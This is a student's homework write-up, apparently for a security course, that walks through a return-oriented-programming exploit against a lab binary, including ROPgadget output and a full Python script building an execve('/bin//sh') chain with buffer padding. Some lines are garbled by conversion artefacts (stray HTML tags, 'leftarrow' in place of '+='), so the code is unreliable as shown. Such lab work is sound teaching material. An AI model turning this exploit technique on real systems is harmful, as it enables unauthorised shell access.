Homework 2

David Luo

811357331

Experience

This homework was pretty easy just following the steps listed in the pdf in the GitHub repo.

Steps

```
Use 1dd to get location of 1ibc in memory.
  ubuntu@ubuntu-vm:~/hw2$ ldd ./bin/proj1_dep_Luo.David
          linux-gate.so.1 \Rightarrow (0xf7fd8000)
          libc.so.6 => /lib32/libc.so.6 (0xf7e17000)
          /lib/ld-linux.so.2 (0xf7fd9000)
Use ROPchain with the path to libc and the location of it in proj1_dep_Luo.David.
  ubuntu@ubuntu-vm:~/hw2$ ROPgadget --binary /lib32/libc.so.6 --offset 0xf7e17000 --ropchain
 Unique gadgets found: 32804
 ROP chain generation
  - Step 1 -- Write-what-where gadgets
          [+] Gadget found: 0xf7e9363c mov dword ptr [esi], ebx; pop ebx; pop esi; ret
          [+] Gadget found: 0xf7e2e828 pop esi; ret
          [+] Gadget found: 0xf7e2f395 pop ebx; ret
          [-] Can't find the 'xor ebx, ebx' gadget. Try with another 'mov [r], r'
          [+] Gadget found: 0xf7f340ab mov dword ptr [edx], esi ; pop ebx ; pop esi ; ret
          [+] Gadget found: 0xf7e18aa6 pop edx ; ret
          [+] Gadget found: 0xf7e2e828 pop esi; ret
          [-] Can't find the 'xor esi, esi' gadget. Try with another 'mov [r], r'
          [+] Gadget found: 0xf7e53cd8 mov dword ptr [edx], ecx; ret
          [+] Gadget found: 0xf7e18aa6 pop edx ; ret
          [+] Gadget found: 0xf7ecb047 pop ecx; ret
          [-] Can't find the 'xor ecx, ecx' gadget. Try with another 'mov [r], r'
          [+] Gadget found: 0xf7f47394 mov dword ptr [edx], ecx; pop ebx; ret
          [+] Gadget found: 0xf7e18aa6 pop edx ; ret
          [+] Gadget found: 0xf7ecb047 pop ecx; ret
          [-] Can't find the 'xor ecx, ecx' gadget. Try with another 'mov [r], r'
          [+] Gadget found: 0xf7e8234b mov dword ptr [edx], eax; ret
          [+] Gadget found: 0xf7e18aa6 pop edx; ret
          [+] Gadget found: 0xf7e3af97 pop eax ; ret
          [+] Gadget found: 0xf7e435fc xor eax, eax; ret
  - Step 2 -- Init syscall number gadgets
```

[+] Gadget found: 0xf7e435fc xor eax, eax ; ret
[+] Gadget found: 0xf7e1eeec inc eax ; ret

```
- Step 3 -- Init syscall arguments gadgets
        [+] Gadget found: 0xf7e2f395 pop ebx; ret
        [+] Gadget found: 0xf7ecb047 pop ecx; ret
        [+] Gadget found: 0xf7e18aa6 pop edx; ret
- Step 4 -- Syscall gadget
        [+] Gadget found: 0xf7e19c87 int 0x80
- Step 5 -- Build the ROP chain
        #!/usr/bin/env python2
        # execve generated by ROPgadget
        from struct import pack
        # Padding goes here
        p = ''
        p += pack('<I', 0xf7e18aa6) # pop edx ; ret</pre>
        p += pack('<I', 0xf7fc7040) # @ .data</pre>
        p += pack('<I', 0xf7e3af97) # pop eax ; ret
        p += '/bin'
        p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
        p += pack('<I', 0xf7e18aa6) # pop edx ; ret</pre>
        p += pack('<I', 0xf7fc7044) # @ .data + 4</pre>
        p += pack('<I', 0xf7e3af97) # pop eax ; ret</pre>
        p += '//sh'
        p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
        p += pack('<I', 0xf7e18aa6) # pop edx ; ret</pre>
        p += pack('<I', 0xf7fc7048) # @ .data + 8</pre>
        p += pack('<I', 0xf7e435fc) # xor eax, eax ; ret
        p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
        p += pack('<I', 0xf7e2f395) # pop ebx ; ret
        p += pack('<I', 0xf7fc7040) # @ .data</pre>
        p += pack('<I', 0xf7ecb047) \# pop ecx ; ret
        p += pack('<I', 0xf7fc7048) # @ .data + 8</pre>
        p += pack('<I', 0xf7e18aa6) # pop edx ; ret</pre>
        p += pack('<I', 0xf7fc7048) # @ .data + 8</pre>
        p += pack('<I', 0xf7e435fc) # xor eax, eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax; ret
        p += pack('<I', 0xf7e1eeec) # inc eax; ret
        p += pack('<I', 0xf7e1eeec) # inc eax; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e1eeec) # inc eax ; ret
        p += pack('<I', 0xf7e19c87) # int 0x80
```

Put the above output in rop.py and change the initial value of p to be 'A' * 257 as in proj1, and add a statement to print out the value of p.

```
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = 'A' * 257
```

```
p += pack('<I', 0xf7e18aa6) # pop edx ; ret</pre>
p += pack('<I', 0xf7fc7040) # @ .data
p += pack('<I', 0xf7e3af97) # pop eax ; ret
p += '/bin'
p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
p \leftarrow pack('<I', 0xf7e18aa6) \# pop edx ; ret
p += pack('<I', 0xf7fc7044) # @ .data + 4
p += pack('<I', 0xf7e3af97) # pop eax ; ret
p += '//sh'
p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0xf7e18aa6) # pop edx ; ret
p += pack('<I', 0xf7fc7048) # @ .data + 8
p \leftarrow pack('<I', 0xf7e435fc) \# xor eax, eax ; ret
p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
p \leftarrow pack('<I', 0xf7e2f395) \# pop ebx ; ret
p += pack('<I', 0xf7fc7040) # @ .data
p \leftarrow pack('<I', 0xf7ecb047) \# pop ecx ; ret
p += pack('<I', 0xf7fc7048) # @ .data + 8
p += pack('<I', 0xf7e18aa6) # pop edx ; ret
p += pack('<I', 0xf7fc7048) # @ .data + 8
p += pack('<I', 0xf7e435fc) # xor eax, eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p \leftarrow pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret</pre>
p += pack('<I', 0xf7e1eeec) # inc eax ; ret</pre>
p += pack('<I', 0xf7e1eeec) # inc eax ; ret</pre>
p += pack('<I', 0xf7e1eeec) # inc eax ; ret</pre>
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e19c87) # int 0x80</pre>
print(p)
```

Use the generated script's output as an argument for proj1_dep_Luo.David.

ubuntu@ubuntu-vm:~/hw2\$./proj1_dep_Luo.David \$(python rop.py)